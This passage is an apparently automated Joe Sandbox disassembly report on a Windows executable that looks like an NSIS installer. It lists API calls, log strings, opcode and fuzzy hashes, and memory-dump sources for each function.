                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                          • API String ID: 1641139501-220328614
                                          • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                          • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                          • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                          • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                          Strings
                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                          • String ID: created uninstaller: %d, "%s"
                                          • API String ID: 3294113728-3145124454
                                          • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                          • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                          • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                          • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                          APIs
                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                          • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                          • API String ID: 3734993849-2769509956
                                          • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                          • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                          • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                          • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                          • GetSysColor.USER32(00000000), ref: 00403E00
                                          • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                          • SetBkMode.GDI32(?,?), ref: 00403E18
                                          • GetSysColor.USER32(?), ref: 00403E2B
                                          • SetBkColor.GDI32(?,?), ref: 00403E3B
                                          • DeleteObject.GDI32(?), ref: 00403E55
                                          • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                          Strings
                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                          Similarity
                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                          • API String ID: 1033533793-945480824
                                          APIs
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                            • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                            • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                          Strings
                                          • Exec: success ("%s"), xrefs: 00402263
                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                          • Exec: command="%s", xrefs: 00402241
                                          Similarity
                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                          • API String ID: 2014279497-3433828417
                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                          • GetMessagePos.USER32 ref: 00404871
                                          • ScreenToClient.USER32(?,?), ref: 00404889
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          • API String ID: 41195575-1993550816
                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                          • MulDiv.KERNEL32(0001A800,00000064,?), ref: 00403295
                                          • wsprintfW.USER32 ref: 004032A5
                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                          Strings
                                          • verifying installer: %d%%, xrefs: 0040329F
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: verifying installer: %d%%
                                          • API String ID: 1451636040-82062127
                                          APIs
                                          • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                          • wsprintfW.USER32 ref: 00404457
                                          • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s$@rD
                                          • API String ID: 3540041739-1813061909
                                          APIs
                                          • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                          • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                          • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: *?|<>/":
                                          • API String ID: 589700163-165019052
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                          Similarity
                                          • API ID: Close$DeleteEnumOpen
                                          • String ID:
                                          • API String ID: 1912718029-0
                                          APIs
                                          • GetDlgItem.USER32(?), ref: 004020A3
                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          APIs
                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          APIs
                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                          Similarity
                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                          • API String ID: 1697273262-1764544995
                                          • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                          • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                          • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                          • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00404902
                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID: $@rD
                                          • API String ID: 3748168415-881980237
                                          • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                          • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                          • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                          • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                          APIs
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                            • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                            • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                          • lstrlenW.KERNEL32 ref: 004026B4
                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                          • String ID: CopyFiles "%s"->"%s"
                                          • API String ID: 2577523808-3778932970
                                          • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                          • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                          • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                          • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: lstrcatwsprintf
                                          • String ID: %02x%c$...
                                          • API String ID: 3065427908-1057055748
                                          • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                          • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                          • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                          • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                          APIs
                                          • OleInitialize.OLE32(00000000), ref: 00405057
                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                          • String ID: Section: "%s"$Skipping section: "%s"
                                          • API String ID: 2266616436-4211696005
                                          • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                          • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                          • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                          • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                          APIs
                                          • GetDC.USER32(?), ref: 00402100
                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                          • String ID:
                                          • API String ID: 1599320355-0
                                          • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                          • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                          • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                          • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                          APIs
                                            • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                          • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                          • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                          • String ID: Version
                                          • API String ID: 512980652-315105994
                                          • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                          • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                          • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                          • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                          APIs
                                          • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                          • GetTickCount.KERNEL32 ref: 00403303
                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                          • String ID:
                                          • API String ID: 2102729457-0
                                          • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                          • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                          • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                          • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                          • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                          • String ID:
